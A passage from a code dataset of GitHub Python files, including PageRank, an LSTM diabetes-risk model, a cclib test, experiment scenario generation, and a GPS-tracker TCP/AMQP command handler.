self.d)*1000 / x0.shape[0]\n del cur # free memory\n print(x_cur.shape)\n for each in x_cur:\n x_next.append(each)\n print(np.array(x_next).shape)\n x_next = np.array(x_next).reshape(-1)\n print('Iteration '+str(j)+', zero elements in the PR vector: '+str(np.sum(x_next==0)))\n error = sum(abs(x_next - x0))\n with open('error0_1000_0.0001_1-d_0.8.txt', 'a',encoding = 'utf-8') as f:\n f.write(str(error)+'\\n')\n print(\"Current iteration error {} \".format(error))\n x0 = x_next\n cur_time = time.time()\n print(\"Current total time {} s\".format(cur_time-last_time))\n last_time = cur_time\n if error < min_error:\n break\n print(sum(x0))\n return x0,graph_list\n\nif __name__ == '__main__':\n time_start = time.time()\n filename = \"./NORM1Net_single05_19.csv\"\n graph = parse(filename)\n p = PageRank(graph)\n A = p.rank()\n df = pd.DataFrame()\n df['key'] = A[1]\n df['PR'] = A[0]\n df.to_csv('./PR0_0.0001_1000_1-d_0.8.csv',encoding = 'utf-8') # save results\n\n time_end = time.time()\n print(\"total time {} 
s\".format(time_end-time_start))\n\n","repo_name":"Lishjie/evaluate_academic_papers_and_groups_new_methods","sub_path":"calculate CPI/block_PR_ours_NORM0.py","file_name":"block_PR_ours_NORM0.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40786720183","text":"import pandas as pd\nimport numpy as np\nimport sys\nfrom scipy.stats import ttest_ind\nfrom sklearn.metrics import confusion_matrix,roc_auc_score,average_precision_score,classification_report,f1_score\nimport random\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport torch\nimport torchvision\nimport torch.nn as nn # All neural network modules, nn.Linear, nn.Conv2d, BatchNorm, Loss functions\nimport torch.optim as optim # For all Optimization algorithms, SGD, Adam, etc.\nimport torch.nn.functional as F # All functions that don't have any parameters\nimport copy\nfrom torch.nn import init\nimport math\nimport argparse\nfrom scipy import stats\nimport matplotlib.pyplot as plt \nimport seaborn as sns \nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\n\nnp.set_printoptions(precision=3)\ntorch.manual_seed(0)\nnp.random.seed(42)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--hidden_size\", type=int, default=200)\n parser.add_argument(\"--num_layers\", type=int, default=3)\n parser.add_argument(\"--num_epochs\", type=int, default=5) \n parser.add_argument(\"--batch_size\", type=int, default=16)\n parser.add_argument(\"--learning_rate\", type=float, default=0.00001) \n parser.add_argument(\"--end\", type=int,help='IA cutoff', default=24) \n parser.add_argument(\"--serial\", type=int,help='gene exp cutoff', default=16) \n parser.add_argument(\"--device\", type=str,default='cuda') \n parser.add_argument(\"--option\", type=int,help='0 for combined data, 6 for only gene exp',default=0) \n parser.add_argument(\"--demo\", type=bool,default=False) \n parser.add_argument(\"--HLA\", type=bool,default=False) \n parser.add_argument(\"--history\", type=bool,default=False) \n parser.add_argument(\"--imputed_data_dir\", type=str,help='save directory for imputation.py',default='/home/tanvir/Diabetes/data/imputed_data/') \n parser.add_argument(\"--processed_data_dir\", type=str,help='save directory for data_processing.py',default='/home/tanvir/Diabetes/data/processed_data/') \n parser.add_argument(\"--raw_data_dir\", type=str,help='directory of raw omics data',default='/home/tanvir/Diabetes/data/raw_data/') \n args = parser.parse_args()\n print(args)\n\nimputed_data_dir = args.imputed_data_dir\nprocessed_data_dir = args.processed_data_dir\nraw_data_dir = args.raw_data_dir\ndevice = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\ndef persistent_pos(data,mask_id,end):\n new_id = []\n for temp in mask_id:\n y = data[data[\"MaskID\"].isin([temp])]\n y = y.drop_duplicates(subset=['SAMPLE_COLLECTION_VISIT'], keep='first')\n y = y.sort_values(by=['SAMPLE_COLLECTION_VISIT'])\n xy,x_ind,y_ind = np.intersect1d(np.arange(3,end+1,3),y.loc[:,\"SAMPLE_COLLECTION_VISIT\"].values,return_indices=True) \n y = y.iloc[y_ind,:]\n #y = np.sort(y[y[\"OUTCOME\"].isin([\"b'Pos'\"])].loc[:,'SAMPLE_COLLECTION_VISIT'])\n y = y.loc[:,'OUTCOME'].values\n y[y==\"b'Neg'\"]=0\n y[y==\"b'Pos'\"]=1\n\n if np.size(y)>1:\n y = np.convolve(y,np.ones(2,dtype=int),'valid')\n if 2 in y:\n new_id.append(temp)\n\n 
return new_id\n \n\ndef find_thr(predictions,target):\n best_score=0\n grid = np.arange(0.35,0.95,0.001)\n for thr in grid:\n predictions_b = np.where(predictions>=thr,1,0)\n #score = f1_score(target,predictions_b)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n score = (tp/(tp+fn))+(tn/(tn+fp))\n\n if score>best_score:\n best_score = score\n best_thr = thr\n\n return best_thr\n\n\ndef validation(epoch, loader, model):\n \n # Set model to eval\n model.eval()\n predictions=[]\n target=[]\n with torch.no_grad():\n for x, y in loader:\n \n x = x.to(device) \n scores = model(x)\n\n predictions.append(scores.cpu().detach().numpy().ravel().ravel())\n target.append(y.numpy().ravel())\n\n predictions = np.squeeze(predictions,0)\n target = np.squeeze(target,0)\n threshold = find_thr(predictions,target)\n predictions_b = np.where(predictions>=threshold,1,0)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n\n return tp/(tp+fn), threshold\n\ndef check_accuracy(epoch, loader, model, threshold):\n \n # Set model to eval\n model.eval()\n predictions=[]\n target=[]\n with torch.no_grad():\n for x, y in loader:\n \n x = x.to(device) \n scores = model(x)\n\n predictions.append(scores.cpu().detach().numpy().ravel().ravel())\n target.append(y.numpy().ravel())\n\n predictions = np.squeeze(predictions,0)\n target = np.squeeze(target,0)\n predictions_b = np.where(predictions>=threshold,1,0)\n tn, fp, fn, tp = confusion_matrix(target, predictions_b).ravel()\n\n return roc_auc_score(target, predictions),average_precision_score(target, predictions), f1_score(target, predictions_b),\\\n tn/(tn+fp), tp/(tp+fn),tp/(tp+fp) , classification_report(target, predictions_b)\n\n\ndef masking(input_data,mask):\n new_data = np.zeros((np.shape(input_data)))\n\n for row in range(np.size(mask,0)):\n for column in range(np.size(mask,1)):\n if mask[row,column]==0:\n new_data[row,column,:] = input_data[row,column,:]\n input_data[row,column,:]=0\n\n input_data = new_data.astype(np.float32)\n return input_data\n\n\nclass RNN_LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\n super(RNN_LSTM, self).__init__()\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True)\n self.fc = nn.Linear(hidden_size, num_classes)\n self.act = nn.Sigmoid()\n\n def forward(self, x):\n # Set initial hidden and cell states\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)\n\n # Forward propagate LSTM\n out, _ = self.lstm(x, (h0, c0)) \n\n # Decode the hidden state of the last time step\n out = self.fc(out[:,-1,:])\n out = self.act(out)\n\n return out\n\n\n\ninput_data = np.load(imputed_data_dir+'comb_gene_gan.npy') #large_cohort\nfeature_name = pd.read_csv(processed_data_dir+'feature_name.csv',header=None)\nfeature_name = feature_name.values\nsample_name = pd.read_csv(processed_data_dir+'sample_name.csv',header=None) \nniddk_id = sample_name.values.ravel()\n\nvar = np.var(input_data, axis=0)\nvar = np.mean(var,axis=0)\nfeat = np.argsort(var)[::-1]\n\nmask = pd.read_csv(processed_data_dir+'mask.csv',header=None,delimiter=',')\ninput_data = masking(input_data,mask.values)\n\n'''\nfor i in range(16):\n temp = input_data[:,i,:]\n scaler = QuantileTransformer(n_quantiles=4, random_state=0)#.fit(train.transpose()) #StandardScaler()\n temp = scaler.fit_transform(temp.transpose())\n input_data[:,i,:] = 
temp.transpose()\n'''\n\n\nclinical_data = pd.read_csv(raw_data_dir+'test_results.csv',index_col=0)\nclinical_data = clinical_data[['TEST_NAME','RESULT','OUTCOME','SAMPLE_COLLECTION_VISIT','MaskID']]\nclinical_data = clinical_data[clinical_data[\"OUTCOME\"].isin([\"b'Neg'\",\"b'Pos'\"])] \nclinical_data = clinical_data[clinical_data[\"MaskID\"].isin(niddk_id)] \n\ntotal_pp = []\nfor IA in [\"b'GAD'\",\"b'IA2A'\",\"b'MIAA'\",\"b'ZnT8A'\"]:\n clinical_data1 = clinical_data[clinical_data[\"TEST_NAME\"].isin([IA])]\n pp = persistent_pos(clinical_data1,niddk_id,args.end)\n total_pp.extend(pp)\n \nPP = np.unique(total_pp)\n\ny = np.zeros((np.shape(input_data)[0],1)).astype(np.float32)\nfor ind, i in enumerate(niddk_id):\n if i in PP:\n y[ind]=1\n\n####\n\nsnp = pd.read_csv(raw_data_dir+'small_sparse_matrix.csv',header=None,delimiter=' ') # #sparse.load_npz('/data/tahmed/Diabetes/snp_to_gene/gan/snp.npz') #\nsnp_data = snp.values.transpose()\nsnp_sample_name = pd.read_csv(raw_data_dir+'phs001037.v2.pht005918.v1.p1.TEDDY_Sample.MULTI.txt',\n skiprows=10,delimiter='\\t',usecols=[3])\n\nlink = pd.read_sas(raw_data_dir+'snp_dbgap_link.sas7bdat')\nxy,x_ind,y_ind = np.intersect1d(snp_sample_name,link.iloc[:,1],return_indices=True)\nsnp_sample_name = link.iloc[y_ind,0]\n\nif args.history is True:\n hist = pd.read_sas(raw_data_dir+'family_history.sas7bdat')\n hist1 = hist.filter(regex='^SIBLINGDIABETIC',axis=1)\n hist2 = hist.loc[:,['MOTHERDIABETIC','FATHERDIABETIC','MaskID']]\n hist = pd.concat((hist1,hist2),axis=1)\n\n snp_sample_name,x_ind,y_ind = np.intersect1d(snp_sample_name,hist.MaskID,return_indices=True)\n snp_data = snp_data[x_ind]\n hist = hist.iloc[y_ind,:]\n ID = []\n for col in hist.columns:\n hist_1 = hist.loc[hist[col].astype(str) == \"b'Yes'\"]\n ID.extend(hist_1.MaskID)\n\n fh = np.zeros((np.size(hist.MaskID),1)).astype(np.float32)\n for e,i in enumerate(hist.MaskID):\n if i in ID:\n fh[e]=1\n\n subset = [2,7,8,9]\n snp_data = snp_data[:,subset]\n fh = np.concatenate((fh,snp_data),axis=1)\n\nelse:\n subset = [2,7,8,9]\n fh = snp_data[:,subset]\n \n\nif args.HLA is True:\n HLA = pd.read_csv('/home/tanvir/Diabetes/HLA.csv',header=None)\n snp_sample_name,x_ind,y_ind = np.intersect1d(HLA.iloc[:,0],snp_sample_name,return_indices=True)\n HLA_data = HLA.iloc[x_ind,[1]]\n fh = fh[y_ind,:]\n fh = np.concatenate((fh,HLA_data),axis=1)\n\nniddk_id,x_ind,y_ind = np.intersect1d(niddk_id,snp_sample_name,return_indices=True)\ninput_data = input_data[x_ind,:,:]\ny = y[x_ind] \nfh = fh[y_ind,:]\n\nif args.demo is True:\n\n ### add demography\n demo = pd.read_csv('/home/tanvir/Diabetes/TEDDY_V20/TEDDY_DATA/screening_form.csv',usecols=[3,11,22,23,24,25,26,27,35])\n demo = demo.set_index(['MaskID'])\n gender = demo.iloc[:,1].astype(str)\n gender[gender==\"b'Female'\"] = 0\n gender[gender==\"b'Male'\"] = 1\n #gender[gender=='nan'] = 0\n\n ethnicity = demo.iloc[:,[0,2,3,4,5,6,7]].astype(str)\n ethnicity[ethnicity== \"b'No'\"] = 0\n ethnicity[ethnicity== \"b'Yes'\"] = 1\n ethnicity[ethnicity=='nan'] = 0\n ethnicity[ethnicity==\"b'Unknown or not reported'\"] = 0\n ethnicity = ethnicity.drop(['RACE_UNKNOWNORNOTREPORTED'],axis=1)\n\n demography = ethnicity# pd.concat((gender,ethnicity),axis=1,ignore_index=False)\n xy,x_ind,y_ind = np.intersect1d(niddk_id,demography.index,return_indices=True)\n input_data = input_data[x_ind,:]\n fh = fh[x_ind,:]\n y = y[x_ind]\n demography = demography.iloc[y_ind].values.astype(float)\n\n fh = np.concatenate((fh,demography),axis=1)\n\nfh = np.expand_dims(fh,1)\nfh = 
np.repeat(fh,16,1) \n\ninput_data = input_data[:,:,feat[0:30]]\ninput_data = np.concatenate([fh,input_data],2).astype(np.float32)\ninput_data = input_data[:,0:args.serial,:]\n\nprint(np.unique(y,return_counts=True))\n\n####\nsample_size = np.size(y)\nhidden_size = args.hidden_size\nnum_layers = args.num_layers\nnum_classes = 1\nlearning_rate = args.learning_rate\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\n\nfor feat in range(15,16):\n AUC=[]\n AUCPR=[]\n F1=[]\n SENSITIVITY=[]\n SPECIFICITY=[]\n PRECISION=[]\n for i in tqdm(range(40,90)):\n ind = np.arange(np.size(y))\n random.seed(i)\n random.shuffle(ind) \n train_idx = ind[0:math.floor(np.size(y)*.6)]\n val_idx = ind[math.floor(np.size(y)*.6):math.floor(np.size(y)*.8)]\n test_idx = ind[math.floor(np.size(y)*.8):]\n\n if np.size(np.unique(y[test_idx]))==1:\n continue\n if np.size(np.unique(y[val_idx]))==1:\n continue\n \n input_size = feat - args.option \n input_data1 = input_data[:,:,args.option:feat]\n input_data1 = torch.tensor(input_data1)\n label=torch.tensor(y)\n \n data_set = [(input_data1[i], label[i]) for i in range(sample_size)]\n \n ind_0=np.where(label[train_idx]==0)[0]\n ind_1=np.where(label[train_idx]==1)[0] \n\n ind_0 = np.array(train_idx)[ind_0]\n ind_1 = np.array(train_idx)[ind_1]\n ### oversampling \n\n if np.size(ind_0)>np.size(ind_1):\n ind_11=np.random.choice(ind_1,np.size(ind_0))\n new_train_idx = np.concatenate([ind_11,ind_0])\n else:\n ind_00=np.random.choice(ind_0,np.size(ind_1))\n new_train_idx = np.concatenate([ind_00,ind_1])\n\n #new_train_idx = train_idx\n nearest_multiple = batch_size * math.ceil(len(new_train_idx)/batch_size)\n add = nearest_multiple - len(new_train_idx)\n new_train_idx = np.concatenate((new_train_idx,new_train_idx[0:add]))\n \n train_sampler = SubsetRandomSampler(new_train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n test_sampler = SubsetRandomSampler(test_idx)\n\n train_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=batch_size,\n sampler=train_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=len(val_idx),\n sampler=val_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n test_loader = torch.utils.data.DataLoader(dataset=data_set,\n batch_size=len(test_idx),\n sampler=test_sampler,\n shuffle=False,\n num_workers=0,\n pin_memory=True)\n\n # Initialize network\n model = RNN_LSTM(input_size, hidden_size, num_layers, num_classes).to(device)\n #model = nn.DataParallel(model)\n # Loss and optimizer\n criterion = nn.BCELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate,weight_decay=1e-5)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, 0.99, last_epoch=-1)\n\n best_val=None\n torch.autograd.set_detect_anomaly(True)\n\n for epoch in range(num_epochs):\n model.train()\n \n for batch_idx, (data, targets) in enumerate(train_loader):\n\n data = data.to(device)\n targets = targets.to(device)\n scores = model(data)\n\n loss = criterion(scores, targets)\n optimizer.zero_grad()\n loss.backward()\n\n optimizer.step()\n\n val_auc, threshold = validation(epoch, val_loader, model)\n \n if best_val is None:\n is_best = True\n best_val = val_auc\n else:\n is_best = val_auc > best_val\n best_val = max(val_auc, best_val)\n\n if is_best: # make a copy of the best model\n model_best = copy.deepcopy(model)\n \n scheduler.step()\n\n test_auc, test_aucpr, test_f1, test_spec, test_sen, test_pre , cls_rpt= check_accuracy(epoch, 
test_loader, model_best,threshold) #\n AUC.append(test_auc)\n AUCPR.append(test_aucpr)\n F1.append(test_f1)\n SPECIFICITY.append(test_spec)\n SENSITIVITY.append(test_sen)\n PRECISION.append(test_pre)\n \n \n print('average AUC:',np.nanmean([AUC]))\n print('average AUCPR:',np.nanmean([AUCPR]))\n print('average F1:',np.nanmean([F1]))\n print('average specificity:',np.nanmean([SPECIFICITY]))\n print('average sensitivity:',np.nanmean([SENSITIVITY]))\n print('average precision:',np.nanmean([PRECISION]))\n","repo_name":"compbiolabucf/Teddy","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":16217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72785597284","text":"import unittest\n\nimport numpy\n\nfrom cclib.bridge import cclib2biopython\nfrom cclib.parser.utils import find_package\n\n\nclass BiopythonTest(unittest.TestCase):\n \"\"\"Tests for the cclib2biopython bridge in cclib.\"\"\"\n\n def setUp(self):\n super(BiopythonTest, self).setUp()\n if not find_package(\"Bio\"):\n raise ImportError(\"Must install biopython to run this test\")\n\n def test_makebiopython(self):\n from Bio.PDB.Superimposer import Superimposer\n atomnos = numpy.array([1, 8, 1], \"i\")\n a = numpy.array([[-1, 1, 0], [0, 0, 0], [1, 1, 0]], \"f\")\n b = numpy.array([[1.1, 2, 0], [1, 1, 0], [2, 1, 0]], \"f\")\n si = Superimposer()\n si.set_atoms(cclib2biopython.makebiopython(a, atomnos),\n cclib2biopython.makebiopython(b, atomnos))\n ref = 0.29337859596\n assert abs(si.rms - ref) < 1.0e-6\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cclib/cclib","sub_path":"test/bridge/testbiopython.py","file_name":"testbiopython.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"52"} +{"seq_id":"70250040164","text":"from StimListGen import *\nfrom WritingScenarios import *\n# set number of subject scenario files\nN = 32\n# Alternate which block type occurs first\nFirst = ['composition','list','composition','list'] * (N // 4) # adjust for remainders\n# And which button is the \"match\" response\nButton =['left','left','right','right'] * (N // 4) # adjust for remainders\n# Generate the scenario files\nfor i in range(0,N):\n subject_idx = i\n FirstBlock = First[i]\n MatchButton = Button[i]\n make_subject_stimlists(subject_idx)\n write_scenario_files(subject_idx, FirstBlock, MatchButton)\n","repo_name":"grahamflick/Minimal-Composition-MEG-Design-Materials","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8172581752","text":"from library.constants import *\n\n\nclass Rectangle:\n PATH_TO_DATASET = 'rect_'\n\n PATH_TO_CLASS = 'dataset_generation.dataset_objects.rectangle.rectangle'\n CLASS = 'Rectangle'\n\n GENERATION_CONFIG = {\n TRAIN_CNT: 20,\n TEST_CNT: 0,\n\n CENTER_INIT: (100, 100, 100),\n CENTER_RANDOMIZE: 20,\n\n SIZE_INIT: 45,\n SIZE_RANDOMIZE: 10,\n\n DOT_RANDOMIZE: 3,\n\n ROTATE_ANGLES: ((20, 60), (20, 60), (20, 60)),\n\n CURVES: (1, 2),\n CURVE_DISTANCE: 1.5,\n\n HATCH_SIZE: 4,\n HATCH_RANDOMIZE: 1,\n }\n\n CREATION_CONFIG = {\n CENTER_INIT: (100, 100, 100),\n CENTER_RANDOMIZE: 0,\n\n SIZE_INIT: 70,\n SIZE_RANDOMIZE: 0,\n\n DOT_RANDOMIZE: 0,\n\n ROTATE_ANGLES: ((60, 60), (60, 60), (60, 60)),\n\n CURVES: (0, 0),\n CURVE_DISTANCE: 0,\n\n HATCH_SIZE: 4,\n HATCH_RANDOMIZE: 0,\n 
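# Note: every *_RANDOMIZE value is 0 here, so CREATION_CONFIG describes a single deterministic rectangle, unlike the randomized GENERATION_CONFIG above.\n 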
}\n","repo_name":"Myroslav341/course_work","sub_path":"config/dataset_objects/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11472221830","text":"from datetime import datetime\nimport os\nimport binascii\nimport base64\nimport socket\nfrom kernel.utils import NeedMoreDataException\nfrom kernel.logger import log\nfrom kernel.config import conf\nfrom lib.broker import broker\n\n\nclass AbstractHandler(object):\n \"\"\"\n Abstract class for all implemented protocols\n \"\"\"\n _packetsFactory = None # packets factory link\n _commandsFactory = None # commands factory link\n\n _buffer = None # buffer of the current dispatch loop (for storage save)\n _uid = None # identifier of currently connected device\n\n def __init__(self, store, clientThread):\n \"\"\"\n Constructor of Listener.\n @param store: kernel.pipe.Manager instance\n @param clientThread: Instance of kernel.server.ClientThread\n \"\"\"\n self.__handlerId = binascii.hexlify(os.urandom(4)).decode()\n self.__store = store\n self.__thread = clientThread\n self.initialization()\n\n def __del__(self):\n \"\"\"\n Destructor of Listener\n @return:\n \"\"\"\n self.finalization()\n\n def initialization(self):\n \"\"\"\n Initialization of the handler\n @return:\n \"\"\"\n log.debug('[%s] initialization', self.handlerId)\n broker.handlerInitialize(self)\n\n def finalization(self):\n \"\"\"\n Finalization of the handler.\n Free allocated resources.\n @return:\n \"\"\"\n log.debug('[%s] finalization', self.handlerId)\n broker.handlerFinalize(self)\n\n @property\n def handlerId(self):\n return self.__handlerId\n\n @property\n def uid(self):\n return self._uid\n\n @uid.setter\n def uid(self, value):\n self._uid = value\n broker.handlerUpdate(self)\n\n def getStore(self):\n \"\"\" Returns store object \"\"\"\n return self.__store\n\n def getThread(self):\n \"\"\" Returns clientThread object \"\"\"\n return self.__thread\n\n def dispatch(self):\n \"\"\"\n Data processing method (after validation) from the device:\n clientThread thread of the socket;\n \"\"\"\n log.debug('[%s] dispatch()', self.handlerId)\n buffer = self.recv()\n while len(buffer) > 0:\n self.processData(buffer)\n buffer = self.recv()\n log.debug('[%s] dispatch() - EXIT (empty buffer?)', self.handlerId)\n\n def needProcessCommands(self):\n \"\"\"\n Returns false if we can not process commands\n @return: boolean\n \"\"\"\n return self.uid\n\n def processData(self, data):\n \"\"\"\n Processing of data from socket / storage.\n Might be overridden in child classes\n @param data: Data from socket\n \"\"\"\n if self._packetsFactory:\n try:\n if self._buffer is None:\n self._buffer = b''\n self._buffer += data\n protocolPackets = (\n self._packetsFactory.getPacketsFromBuffer(self._buffer)\n )\n for protocolPacket in protocolPackets:\n self.processProtocolPacket(protocolPacket)\n self._buffer = None\n except NeedMoreDataException as E:\n log.info('[%s] Need more data...', self.handlerId)\n return\n except Exception as E:\n log.error(\"[%s] processData error: %s\", self.handlerId, E)\n\n log.debug('[%s] Checking handler commands', self.handlerId)\n if not self.needProcessCommands():\n return self\n log.debug('[%s] Ok we can process commands!', self.handlerId)\n\n self.processCommands()\n return self\n\n def processProtocolPacket(self, protocolPacket):\n \"\"\"\n Process protocol packet.\n @type protocolPacket: packets.Packet\n @param protocolPacket: 
Protocol packet\n \"\"\"\n pass\n\n def recv(self):\n \"\"\"\n Receiving data from socket\n @return: String representation of data\n \"\"\"\n\n sock = self.getThread().request\n sock.settimeout(60) # timeout eq. 60 seconds\n total_data = []\n while True:\n try:\n data = sock.recv(conf.socketPacketLength)\n except socket.timeout:\n self.processEvents()\n continue\n except Exception as E:\n log.debug('[%s] %s', self.handlerId, E)\n break\n log.debug('[%s] Data chunk = %s', self.handlerId, data)\n total_data.append(data)\n # I don't know why [if not data: break] is not working,\n # so let's do break here\n if len(data) < conf.socketPacketLength: break\n log.debug('[%s] Total data = %s', self.handlerId, total_data)\n\n return b''.join(total_data)\n\n def send(self, data):\n \"\"\"\n Sends data to a socket\n @param data: data\n \"\"\"\n thread = self.getThread()\n if thread:\n sock = thread.request\n sock.send(data)\n else:\n log.error(\"[%s] Handler thread is not found!\", self.handlerId)\n return self\n\n def processEvents(self):\n \"\"\"\n Process some events while waiting for data from device\n @return:\n \"\"\"\n pass\n\n def store(self, packets):\n \"\"\"\n Sends a list of packets to store\n @param packets: A list of packets\n @return: Instance of lib.falcon.answer.FalconAnswer\n \"\"\"\n result = self.getStore().send(packets)\n if result.isSuccess():\n log.debug('[%s] store() ... OK', self.handlerId)\n else:\n errorsList = result.getErrorsList()\n log.error('[%s] store():\\n %s', self.handlerId, errorsList)\n return result\n\n def translate(self, data):\n \"\"\"\n Translate gps-tracker data to observer pipe format\n @param data: dict() data from gps-tracker\n \"\"\"\n raise NotImplementedError(\n \"Not implemented Handler::translate() method\")\n\n def translateConfig(self, data):\n \"\"\"\n Translate gps-tracker config data to observer format\n @param data: {string[]} data from gps-tracker\n \"\"\"\n raise NotImplementedError(\n \"Not implemented Handler::translateConfig() method\")\n\n def sendImages(self, images):\n \"\"\"\n Sends image to the observer\n @param images: dict() of binary data like {'camera1': b'....'}\n \"\"\"\n if not self.uid:\n log.error('[%s] Cant send an image - self.uid is not defined!',\n self.handlerId)\n return\n imagesList = []\n for image in images:\n image['content'] = base64.b64encode(image['content']).decode()\n imagesList.append(image)\n observerPacket = {\n 'uid': self.uid,\n 'time': datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'images': imagesList\n }\n result = self.store(observerPacket)\n if result.isSuccess():\n log.info('[%s] sendImages(): Images have been sent.',\n self.handlerId)\n else:\n # ? 
Error messages should be converted into readable format\n log.error('[%s] sendImages():\\n %s',\n self.handlerId, result.getErrorsList())\n\n def setPacketSensors(self, packet, sensor):\n \"\"\"\n Makes a copy of some packet data into sensor\n @param sensor: dict\n @param packet: dict\n @return: self\n \"\"\"\n if (packet and sensor and\n isinstance(packet, dict) and\n isinstance(sensor, dict)):\n for key in ['latitude', 'longitude',\n 'altitude', 'speed',\n 'hdop', 'azimuth']:\n if key in packet:\n sensor[key] = packet[key]\n packet['sensors'] = sensor.copy()\n return self\n\n def getConfigOption(self, key, defaultValue = None):\n \"\"\"\n Returns configuration option by its key\n @param key: Configuration key\n @param defaultValue: Default value if key is not found\n @return: mixed\n \"\"\"\n if conf.has_section('settings'):\n section = conf['settings']\n return section.get(key, defaultValue)\n return defaultValue\n\n def processCommands(self):\n \"\"\"\n Processing AMQP commands for current device\n \"\"\"\n try:\n if not self._commandsFactory:\n raise Exception(\"_commandsFactory is not defined!\")\n commands = broker.getCommands(self)\n if commands:\n log.debug(\"[%s] Received commands are: %s\",\n self.handlerId, commands)\n self.processCommand(commands)\n except Exception as E:\n log.error('[%s] %s', self.handlerId, E)\n\n def processCommand(self, command):\n \"\"\"\n Processing AMQP command\n @param command: command\n \"\"\"\n if not command:\n log.error(\"[%s] Empty command description!\", self.handlerId)\n return\n\n if (not self.uid) and ('uid' in command):\n self.uid = command['uid']\n\n log.debug(\"[%s] Processing AMQP command: %s \", self.handlerId, command)\n try:\n if not self._commandsFactory:\n raise Exception(\"_commandsFactory is not defined!\")\n commandName = command[\"command\"]\n commandInstance = self._commandsFactory.getInstance(command)\n if commandInstance:\n log.debug(\"[%s] Command class is %s\",\n self.handlerId, commandInstance.__class__)\n self.sendCommand(commandInstance, command)\n else:\n broker.sendAmqpError(self, \"Command is not supported\")\n log.error(\"[%s] No command with name %s\",\n self.handlerId, commandName)\n except Exception as E:\n log.error(\"[%s] Send command error is %s\", self.handlerId, E)\n\n def sendCommand(self, command, initialParameters = None):\n \"\"\"\n Sends command to the handler\n @param command: AbstractCommand instance\n @param initialParameters: dict Initial command parameters\n \"\"\"\n if not initialParameters:\n raise Exception(\"Empty initial parameters!\")\n\n config = {}\n if \"config\" in initialParameters:\n config = initialParameters[\"config\"]\n transport = initialParameters[\"transport\"]\n\n commandData = command.getData(transport) or []\n if not isinstance(commandData, list):\n commandData = [{\"message\": commandData}]\n\n for item in commandData:\n if not isinstance(item, dict):\n item = {\"message\": item}\n buffer = item[\"message\"]\n if transport == \"tcp\":\n self.send(buffer)\n log.debug('[%s] Command data is sent: %s',\n self.handlerId, buffer)\n elif transport == \"sms\":\n data = {\n 'type': transport,\n 'message': buffer,\n 'remaining': 1\n }\n if 'address' in config:\n data['send_to'] = config['address']\n if 'callback' in config:\n data['callback'] = config['callback']\n if 'id_object' in config:\n data['id_object'] = config['id_object']\n if 'id_firm' in config:\n data['id_firm'] = config['id_firm']\n if 'from' in config:\n data['params'] = {}\n data['params']['from'] = config['from']\n 
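# Note: the assembled payload is published to the 'n.work' AMQP exchange with routing key 'n.work.work.process' below; actual SMS delivery presumably happens in a downstream worker.\n 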
log.debug('[%s] Sending AMQP message to [work.process]...',\n self.handlerId)\n broker.send([data],\n routing_key = 'n.work.work.process',\n exchangeName = 'n.work')\n\n if transport == \"sms\":\n # immediate sending of command update message\n broker.sendAmqpAnswer(self,\n \"Command was successfully received and processed\")\n\n #def initAmqpCommandThread(self):\n # \"\"\"\n # AMQP thread initialization\n # \"\"\"\n # if not self.uid:\n # log.error('initAmqpCommandThread(): self.uid is empty!')\n # return\n # # start message broker thread for receiving tcp commands\n # from lib.broker import MessageBrokerCommandThread\n # log.debug('%s::initAmqpCommandThread()', self.__class__)\n # MessageBrokerCommandThread(self)\n\n @classmethod\n def initAmqpThread(cls, protocol):\n \"\"\"\n AMQP thread initialization\n \"\"\"\n log.debug('%s::initAmqpThread() / %s', cls, protocol)\n # start message broker thread for receiving sms commands\n from lib.broker import MessageBrokerThread\n MessageBrokerThread(cls, protocol)\n","repo_name":"maprox/pipe","sub_path":"lib/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":13013,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"27948982840","text":"import sys\nimport math\nimport computes_with_generator as cg\n\nclass Group:\n def __init__(self, n):\n self.elements = []\n for x in range(n):\n if math.gcd(x, n) == 1:\n self.elements.append(x)\n print(\"Group of units modulo\", n, \"contains:\", len(self.elements),\n \" elements\", self.elements)\n\n\nclass Order:\n def __init__(self, order, generator):\n self.order = order\n self.elements = []\n self.elements.append(generator)\n def output(self):\n print(self.order, \":\", self.elements)\n\n\nn = int(sys.argv[1])\ng = Group(n)\n\norders = []\nfor x in g.elements:\n t = 1\n while t < n:\n if 